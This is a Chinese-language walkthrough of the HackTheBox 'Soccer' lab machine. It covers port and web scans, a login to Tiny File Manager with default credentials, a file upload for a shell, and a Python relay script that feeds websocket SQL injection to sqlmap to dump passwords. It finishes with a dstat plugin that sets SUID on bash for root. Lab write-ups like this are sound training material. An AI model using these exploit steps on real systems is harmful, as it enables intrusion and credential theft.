目标ip: 10.10.11.194
全端口扫描：
Discovered open port 9091/tcp on 10.10.11.194
Discovered open port 80/tcp on 10.10.11.194
Discovered open port 22/tcp on 10.10.11.194

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
|   256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)
|_  256 5797565def793c2fcbdb35fff17c615c (ED25519)
80/tcp   open  http            nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
9091/tcp open  xmltec-xmlmail?

web服务

发现一个域名

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.10.11.194
+ Target Hostname:    10.10.11.194
+ Target Port:        80
+ Start Time:         2023-06-06 17:01:09 (GMT8)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://soccer.htb/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ nginx/1.18.0 appears to be outdated (current is at least 1.20.1).

echo “10.10.11.194 soccer.htb” >> /etc/hosts

目录扫描

gobuster dir -u http://soccer.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k

扫出了一个/tiny目录

searchsploit tiny file

searchsploit -m php/webapps/50828.sh

运行sh脚本一定要查看一下，防止有rm -rf *这种破坏性操作

弱密码进后台

admin

admin@123

后台文件上传getshell

参考这篇文件getshell: https://febin0x4e4a.wordpress.com/2022/01/23/tiny-file-manager-authenticated-rce/

点击upload http://soccer.htb/tiny/tinyfilemanager.php?p=tiny&upload

上传的路径是：/var/www/html/tiny/uploads/1.txt

访问路径是：http://soccer.htb/tiny/uploads/1.txt

抓个数据包看看

POST /tiny/tinyfilemanager.php?p=tiny HTTP/1.1

Host: soccer.htb

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: application/json

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Cache-Control: no-cache

X-Requested-With: XMLHttpRequest

Content-Type: multipart/form-data; boundary=---------------------------34506864736846250242401144636

Content-Length: 445

Origin: http://soccer.htb

Connection: close

Referer: http://soccer.htb/tiny/tinyfilemanager.php?p=tiny&upload

Cookie: filemanager=ejpkhgbqc3462m7kvb2lq4qekf



-----------------------------34506864736846250242401144636

Content-Disposition: form-data; name="p"



tiny

-----------------------------34506864736846250242401144636

Content-Disposition: form-data; name="fullpath"



1.txt

-----------------------------34506864736846250242401144636

Content-Disposition: form-data; name="file"; filename="1.txt"

Content-Type: text/plain



1


-----------------------------34506864736846250242401144636--

behinder文件管理

user.txt的位置在/home/player/user.txt

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

第二次信息搜集

linpeas.sh运行后生成out.txt，大小为138553.

将out.txt下载到本地进行详细分析

尝试提权-失败

看一眼可以提权的sudo版本：https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version

sudo

sudo版本小于1.8.28的Linux系统。此系统是1.8.31不能提权

试试su root

su player，发现需要密码

sudo -l

uname -a看看内核提权

Linux soccer 5.4.0-135-generic #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

snap

/usr/lib/snapd/snap-confine —> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)

snap version
snap 2.57.6
snapd 2.57.6
series 16
ubuntu 20.04
kernel 5.4.0-135-generic

版本太新，不存在

suid

/usr/bin/at —> RTru64_UNIX_4.0g(CVE-2002-1614)

开始注入

nginx的网站给了一个子域名，于是添加soc-player.soccer.htb到/etc/hosts

通过signup注册一个可以登陆的账号：123@qq.com test 123456

然后登陆以后，得到

查看源代码，有一个ws服务。

python3 exp.py

exp.py

from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse
from websocket import create_connection

ws_server = "ws://soc-player.soccer.htb:9091"

def send_ws(payload):
	ws = create_connection(ws_server)
	# If the server returns a response on connect, use below line	
	#resp = ws.recv() # If server returns something like a token on connect you can find and extract from here
	
	# For our case, format the payload in JSON
	message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure
	data = '{"id":"%s"}' % message

	ws.send(data)
	resp = ws.recv()
	ws.close()

	if resp:
		return resp
	else:
		return ''

def middleware_server(host_port,content_type="text/plain"):

	class CustomHandler(SimpleHTTPRequestHandler):
		def do_GET(self) -> None:
			self.send_response(200)
			try:
				payload = urlparse(self.path).query.split('=',1)[1]
			except IndexError:
				payload = False
				
			if payload:
				content = send_ws(payload)
			else:
				content = 'No parameters specified!'

			self.send_header("Content-type", content_type)
			self.end_headers()
			self.wfile.write(content.encode())
			return

	class _TCPServer(TCPServer):
		allow_reuse_address = True

	httpd = _TCPServer(host_port, CustomHandler)
	httpd.serve_forever()


print("[+] Starting MiddleWare Server")
print("[+] Send payloads in http://localhost:8081/?id=*")

try:
	middleware_server(('0.0.0.0',8081))
except KeyboardInterrupt:
	pass

sqlmap

sqlmap -u “http://localhost:8081/?id=1" –risk 3 –level 5 –dbms=mysql -D soccer_db -T accounts –dump

获取到player的密码，进行ssh登陆
PlayerOftheMatch2022

suid

doas和sudo一样，允许普通用户以root权限运行命令。
dstat命令是一个用来替换vmstat、iostat、netstat、nfsstat和ifstat这些命令的工具，是一个全能系统信息统计工具

cd /usr/local/share/dstat/
touch dstat_exploit.py
chmod 777 dstat_exploit.py

vi dstat_exploit.py

import os
os.system('chmod +s /usr/bin/bash')

dstat提权